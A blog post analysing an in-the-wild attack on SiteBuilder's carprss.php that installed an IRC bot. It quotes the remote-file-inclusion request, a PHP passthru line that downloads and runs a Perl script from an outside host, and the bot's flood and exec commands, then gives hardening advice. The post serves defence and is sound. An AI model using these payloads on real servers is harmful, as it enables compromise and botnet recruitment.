carprss.php Exploit

0wn3d! Since 29 February, this blog was hit by 400+ attempts to compromize the server and install an IRC bot. There is a new exploit of SiteBuilder in the wild. Hits came from the following compromized hosts:

# awk '{ print $1 }' <carprss.tmp  | sort -nu
64.128.80.82
64.185.237.176
64.22.112.178
64.255.254.10
64.69.32.173
65.254.53.145
65.36.169.130
68.76.31.154
72.29.80.167
87.101.4.42
87.106.48.129
87.230.84.213
88.198.141.110
88.61.196.190
140.127.223.39
147.102.106.10
193.188.66.23
202.143.142.163
203.200.217.210
203.204.97.53
207.44.248.81
208.1.62.200
208.69.192.133
211.49.171.159
212.179.41.165
212.241.213.119
213.83.47.82
216.154.215.249
216.191.16.13
217.11.95.5

Bad hits look like:

GET /tag//files/carprss.php?CarpPath=http://216.191.16.12/ \
      .shell/site/iyes.txt??

I downloaded the file iyest.txt, it’s a PHP script which contains lot of lines such:

@passthru('cd /tmp;wget http://216.191.16.12/.shell/site/ \
      hai.txt;perl hai.txt;rm -f hai.txt*');

This IP address belongs to AllStream, a Canadian Internet provider.
After a successful download via the URL above, the code is parsed and executed by carprss.php. I downloaded hai.txt. It’s a Perl script which performs several tasks:

#!/usr/bin/perl
#
########################################################
# Ketika Rasa Tak Dapat Di Ungkap Dengan Kata
#       Anak
#       _____
#      ( ___ )  _____  __  ___  ____  _   _
#      | |  \ \(  _  )(  \/   )( _  )( ) ( )
# _\\\\|_|_ _|_)_(_)_||_\__/|_||_|)_||_|_|_|_\ AnakDompu
#  ////| |   | ) | | || |\/ | || ___)| | | | /  crew
#      | |__/ /| (_) || |   | || |   | |_| |
#      (_____) (_____)(_)   (_)(_)   (_____)
#
#              AnakDompu [on] Dalnet © 2008
#
#
########################################################

It set up an IRC bot which try to connect to 61.246.177.225:65500 and join channel #d0s:

# telnet 61.246.177.225 65500
Trying 61.246.177.225...
Connected to 61.246.177.225.
Escape character is '^]'.
:irc.Indonesia.B0tN3t.org NOTICE AUTH :*** Looking up your hostname...
:irc.Indonesia.B0tN3t.org NOTICE AUTH :*** Found your hostname

This IP address belongs to AirTel, an Internet provider in New-Delhi.

The bot understands the following commands: “user”, “restart”, “mail”, “safe”, “inbox”, “conback”, “dns”, “info”, “vunl”, “bot”, “uname”, “rndnick”, “raw”, “eval”, “sexec”, “exec”, “passthru”, “popen”, “system”, “pscan”, “ud.server”, “download”, “die”, “logout”, “udpflood”, “tcpflood”.

How to avoid this kind of attack? First, run patched software! But how to prevent them?

  • Do not run public servers with administrative right (root).
  • Run the servers in a chroot’d environment.
  • Do not allow outgoing to unusual ports (65500 in this case).
  • Use ACL systems to prevent the servers to executre or access to unusual files or directories. [1]
  • Run an selinux on Linux or systrace on *BSD.

    I do not publish the scripts here but I kept a copy of them. Ask me if you need to have a look at it “for study only”. If you have more information, let share them!

One comment

  1. As an extra precaution, you could also”
    – run some kind of ID(P)S on your system
    – run log analyzers so you can detect the breach. In this case a baseline anomaly analyzer would be great to detect that there is ‘something’ going on.
    Of course, this is more reactive technology but it helps to investigate if all the preventive tech fails. It can also help to detect stuff based on the reports of the IDS/analyzer if they got through the preventive measures.

    Tom

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.